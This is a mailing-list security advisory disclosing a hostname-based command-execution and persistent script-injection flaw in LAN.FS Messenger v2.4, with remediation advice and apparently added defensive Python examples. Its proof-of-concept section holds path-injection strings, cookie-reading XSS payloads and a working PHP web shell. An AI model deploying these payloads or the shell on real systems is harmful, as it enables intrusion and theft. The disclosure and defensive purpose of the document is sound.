[Full-disclosure] LAN.FS Messenger Software v2.4 - Command Execution Vulnerability
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] LAN.FS Messenger Software v2.4 - Command Execution Vulnerability
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Tue, 20 Nov 2012 04:13:30 +0100
Title:
======
LAN.FS Messenger v2.4 - Command Execution Vulnerability
Date:
=====
2012-11-14
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=760
VL-ID:
=====
760
Common Vulnerability Scoring System:
====================================
8.2
Introduction:
=============
Lan.FS is a very quick, small and compact freeware network tool (for non-commercial use only) for Windows 2000/XP/2003/Vista & Windows 7. It is easy to handle for beginners and provides various functions for experts, too. Some features are:
Messenger with animated emoticons
File transfer service with status display
Remote Desktop functions to telecommand other computers in your network
Remote Shell function for access to the system prompt of other computers in your network
Access to the whole filesystem of other computers
Windows commands (reboot, shutdown, user switch, run) on other computers
These functions are provided in your Local Area Network. Innovative aspects concerning network programs are:
Lan.FS is ready for operation directly after finishing installation.
You do not need specialised knowledge about networks and network administration
Lan.FS does not feature needless functions: You decide what to do.
Lan.FS works independently of Windows workgroups
Lan.FS works in WLAN networks (even if they are not absolutely stable)
Lan.FS provides substantial support and troubleshooting
Lan.FS is Vista capable
(Copy of the Vendor Homepage: http://www.lan-fs.de/ )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered a command execution
vulnerability in the official LAN.FS v2.4 Messenger Software.
Report-Timeline:
================
2012-11-12: Public Disclosure
Status:
========
Published
Exploitation-Technique:
=======================
Remote
Severity:
=========
Critical
Details:
========
A command execution vulnerability was detected in the official LAN.FS v2.4 Messenger Software. The vulnerability allows a remote attacker, without user interaction, to execute system-specific commands and compromise a connected client system on the LAN. The command execution vulnerability is located in the Netzwerkeinstellungen (network settings) > Administration (Computer editieren, add & co.) > Computersettings (Computereinstellungen) module and is bound to the Computername input field. A remote attacker can set their own computer name to a malicious value so that system commands or script code are executed against a connected client via the Messenger Service (Nachrichtendienst). The Windows path commands/requests or the injected script code are executed directly from the Nachrichtendienst web (HTML) context, because the hostname is placed into the message markup without encoding. Successful exploitation of the vulnerability results in system compromise via command injection/execution, persistent script code injection, persistent software context manipulation, external malware loads or malicious external redirects. Exploitation of the vulnerability requires a connected conversation but no direct user interaction.
The commands or script code are executed when the arriving message is processed for display.
Vulnerable Software Section(s):
[+] Local Area Network - Computer Details
Vulnerable Software Module(s):
[+] Computersettings
Vulnerable Software Parameter(s):
[+] Computername
Affected Software Module(s):
[+] Nachrichtendienst (Messenger Service)
Proof of Concept:
=================
The software validation vulnerability can be exploited by a remote attacker without user interaction or an application user account.
For demonstration or reproduction ...
PoC: Command Execution or Injection (Path, Files & CMD)
%20../'+C:\ProgramData\Lan.FS\
%20../'+C:\ProgramData\Lan.FS\Profile\
%20../'+C:\Program Files (x86)\Lan.FS
<HTML><BODY>
<!-- PoC helper page from the advisory: submits the "cmd" field back to this same script -->
<FORM METHOD="GET" NAME="Message" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<?php
// Full open tag instead of the short "<?" tag, which is disabled on many PHP installs
if (isset($_GET['cmd']) && $_GET['cmd'] !== '') {
    system($_GET['cmd']);
}
?>
</pre>
</BODY></HTML>
Review: Command Execution - Messenger (Windows7) Logs
<html><body style="background-image:url(%20../'+C:\ProgramData\Lan.FS\Profile\);
<html><body style="background-image:url(%20../'+C:\ProgramData\Lan.FS\Profile\);
<html><body style="background-image:url(%20../'+C:\Program Files (x86)\Lan.FS);
PoC: Script Code Inject
>“<iframe src=http://vuln-lab.com>>
"><iframe src=vuln-lab.com onload=alert("VL") <>
>"<script>alert(document.cookie)</script><div style="1
Review: Script Code Inject - Messenger (Windows7) Logs
<html><body
style="background-image:url(C:\ProgramData\Lan.FS\Profile\Emoticons\background.bmp);background-repeat:no-repeat;
background-attachment:fixed; background-position:bottom
right;"></body></html><div style="font-family: Verdana; font-size: 10px;
color: #0000ff"><b>>“<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA
SYSTEMSETTINGS!]> (20:35:38):</b></div><div style="font-family: Verdana;
font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family: Verdana; font-size: 10px;
color: #ff0000"><b>>“<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA
SYSTEMSETTINGS!]> (20:35:46):</b></div><div style="font-family:
Verdana; font-size: 10px; color: #000000">hi<br>
<br></div><div style="font-family:
Verdana; font-size: 10px; color: #0000ff"><b>>"<[PERSISTENT INJECTED SCRIPT
CODE AS HOSTNAME VIA SYSTEMSETTINGS!]><div style="1
>"<[PERSISTENT INJECTED SCRIPT CODE AS HOSTNAME VIA SYSTEMSETTINGS!])</script>
<div style="1 (20:36:27):</b></div><div style="font-family: Verdana; font-size:
10px; color: #000000">hi<br>
<br></div><div style="font-family:
Verdana; font-size: 10px; color:
#ff0000"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script>
<div style="1 (20:36:29):</b></div><div style="font-family: Verdana; font-size:
10px; color: #000000">hi<br>
<br></div><div style="font-family:
Verdana; font-size: 10px; color:
#0000ff"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script>
<div style="1 (20:36:33):</b></div><div style="font-family: Verdana; font-size:
10px; color: #000000">>"<script>alert(document.cookie)</script>
<div style="1<br></div><div style="font-family: Verdana; font-size: 10px;
color: #ff0000"><b>>"<script>alert(document.cookie)
</script><div style="1 >"<script>alert(document.cookie)</script><div style="1
(20:36:34):</b></div><div style="font-family: Verdana; font-size:
10px; color: #000000">>"<script>alert(document.cookie)</script><div
style="1<br></div><div style="font-family: Verdana;
font-size: 10px; color:
#0000ff"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script><div style="1
(20:36:41):</b></div><div style="font-family: Verdana; font-size: 10px; color:
#000000">yea<br></div><div style="font-family: Verdana; font-size:
10px; color: #ff0000"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script>
<div style="1 (20:36:42):</b></div><div style="font-family: Verdana; font-size:
10px; color: #000000">yea<br></div><div style="font-family:
Verdana; font-size: 10px; color:
#0000ff"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script>
<div style="1
(20:36:49):</b></div><div style="font-family: Verdana; font-size: 10px; color:
#000000">tha boss :D<br></div>
<div style="font-family: Verdana; font-size: 10px; color:
#ff0000"><b>>"<script>alert(document.cookie)</script><div style="1
>"<script>alert(document.cookie)</script><div style="1
>(20:36:50):</b></div><div style="font-family: Verdana; font-size: 10px;
color: #000000">tha boss :D<br></div>
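The log excerpts above show how an injected hostname survives in the messenger's HTML chat history. As an added example (not part of the advisory and not LAN.FS code), the following Python scan extracts the sender header of each message from a log in that layout and flags senders that contain markup or filesystem path characters, which a real computer name never has. The sample log is constructed for this example from the pattern shown in the advisory; the function names and the character rule are assumptions.

```python
"""Flag sender names carrying markup or paths in a LAN.FS-style chat log.

Added example for this advisory; the log layout follows the excerpts
quoted above, the sample log itself is constructed.
"""
import re
from typing import List, Tuple

# Sender header as it appears in the advisory's log excerpts:
#   <div style="..."><b>HOSTNAME (HH:MM:SS):</b></div>
# The lazy group tolerates an injected name that itself contains tags.
_HEADER_RE = re.compile(r"<b>(.*?) \((\d{2}:\d{2}:\d{2})\):</b>", re.DOTALL)

# Characters a legitimate Windows computer name never contains
# (assumed rule for this example): tag/attribute delimiters,
# URL-encoding, drive paths and directory traversal.
_SUSPICIOUS_RE = re.compile(r"""[<>"'%]|[A-Za-z]:\\|\.\./""")

# Constructed sample log in the advisory's layout: one clean sender,
# one sender carrying script code, one sender carrying a local path.
SAMPLE_LOG = (
    '<div style="font-family: Verdana; color: #0000ff"><b>WORKSTATION-07 (20:35:38):</b></div>'
    '<div style="color: #000000">hi<br></div>'
    '<div style="font-family: Verdana; color: #ff0000"><b>>"<script>alert(document.cookie)</script>'
    '<div style="1 (20:36:29):</b></div><div style="color: #000000">hi<br></div>'
    '<div style="font-family: Verdana; color: #0000ff"><b>%20../\'+C:\\ProgramData\\Lan.FS\\Profile\\ (20:36:41):</b></div>'
    '<div style="color: #000000">yea<br></div>'
)


def extract_senders(log_html: str) -> List[Tuple[str, str]]:
    """Return (sender, timestamp) for every message header in the log."""
    return _HEADER_RE.findall(log_html)


def find_suspicious_senders(log_html: str) -> List[Tuple[str, str]]:
    """Return only the headers whose sender field looks injected."""
    return [(sender, ts) for sender, ts in extract_senders(log_html)
            if _SUSPICIOUS_RE.search(sender)]


if __name__ == "__main__":
    for sender, ts in find_suspicious_senders(SAMPLE_LOG):
        print(f"{ts}: suspicious sender {sender!r}")
```

Run over a real log directory, each hit points at a peer whose configured computer name is not a name at all; the timestamp lets you correlate with the messenger's own connection records.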
Manually reproduce ...
1. Install LAN.FS 2.4.x and start LAN.FS 2.4.x.
2. In the Windows 7 system settings, change the computer name/hostname to a system path command or to script code. Save!
3. In Netzwerkeinstellungen > Administration > Computersettings, change the hostname to the same values with the system path command or script code (see 2.). Save!
4. Update the settings and connect the Nachrichtendienst to the target system.
5. Send an arbitrary message to the victim via the LAN.FS messenger.
6. The vulnerable hostname in the message header can trigger local file requests, execute files and path commands, or execute persistent malicious script code.
7. The command or script code is executed when the messenger processes the attacker's arrived message for display. No user interaction required!
Solution:
=========
The vulnerability can be patched by validating (parsing) the hostname (computername) input field, and additionally by encoding the hostname wherever the messenger software lists it in its web context.
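The Details section above describes a peer-supplied computer name being placed straight into the messenger's HTML message context, and the Solution calls for validating the field and encoding it at output. As an added example (not LAN.FS code, whose source is not on the page), the following Python sketch puts the defective rendering beside a hardened form: a validator that rejects values that cannot be Windows computer names, and a renderer that HTML-encodes the name and the message body before they enter the markup. The NetBIOS-style name rule, the function names and the sample values are assumptions for this example; the injected values are modelled on the advisory's own payloads.

```python
"""Hostname handling in a LAN chat display: defect beside the fix.

Added example for this advisory, not LAN.FS code. Sample values
are constructed after the advisory's payloads.
"""
import html
import re

# Constructed sample inputs (assumed for this example).
INJECTED_HOSTNAME = '>"<script>alert(document.cookie)</script><div style="1'
PATH_HOSTNAME = "%20../'+C:\\ProgramData\\Lan.FS\\Profile\\"
GOOD_HOSTNAME = "WORKSTATION-07"

# Assumed rule: a Windows (NetBIOS) computer name is 1-15 characters of
# letters, digits and hyphens, not starting or ending with a hyphen.
# Quotes, angle brackets, backslashes, colons and '%' are never legitimate.
_HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,13}[A-Za-z0-9])?$")


def is_valid_computername(name: str) -> bool:
    """Input-side check the Solution asks for on the Computername field."""
    return bool(_HOSTNAME_RE.match(name))


def render_message_vulnerable(hostname: str, text: str, ts: str) -> str:
    """The defect: the peer's hostname is interpolated raw into the chat HTML.

    This mirrors the header layout visible in the advisory's Windows 7 log
    excerpts, where the injected name appears inside <b>...</b>.
    """
    return (f'<div><b>{hostname} ({ts}):</b></div>'
            f'<div>{text}<br></div>')


def render_message_safe(hostname: str, text: str, ts: str) -> str:
    """Hardened form: reject impossible names, then encode everything.

    Encoding at output is what actually neutralises the injection; the
    validator is defence in depth, since a peer controls its own name.
    """
    if not is_valid_computername(hostname):
        hostname = "[invalid hostname]"
    return (f'<div><b>{html.escape(hostname, quote=True)} '
            f'({html.escape(ts, quote=True)}):</b></div>'
            f'<div>{html.escape(text, quote=True)}<br></div>')


def contains_active_markup(rendered: str) -> bool:
    """True if rendered HTML still carries a live tag or a local drive path."""
    lowered = rendered.lower()
    return "<script" in lowered or "<iframe" in lowered or ":\\" in rendered


if __name__ == "__main__":
    for name in (GOOD_HOSTNAME, INJECTED_HOSTNAME, PATH_HOSTNAME):
        vuln = render_message_vulnerable(name, "hi", "20:36:29")
        safe = render_message_safe(name, "hi", "20:36:29")
        print(f"{name!r}: valid={is_valid_computername(name)} "
              f"vulnerable_live={contains_active_markup(vuln)} "
              f"safe_live={contains_active_markup(safe)}")
```

The same `html.escape` step belongs on any other place the name is rendered, including the `background-image:url(...)` style attribute seen in the command-execution log excerpts; a name that fails validation should never reach a URL or path context at all.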
Risk:
=====
The security risk of the remote command execution vulnerability is estimated as high(+).
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@xxxxxxxxxxxxxxxxxxxxx)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@xxxxxxxxxxxxxxxxxxxxx - support@xxxxxxxxxxxxxxxxxxxxx - research@xxxxxxxxxxxxxxxxxxxxx
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material, contact (admin@xxxxxxxxxxxxxxxxxxxxx or support@xxxxxxxxxxxxxxxxxxxxx) to get permission.
Copyright © 2012 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/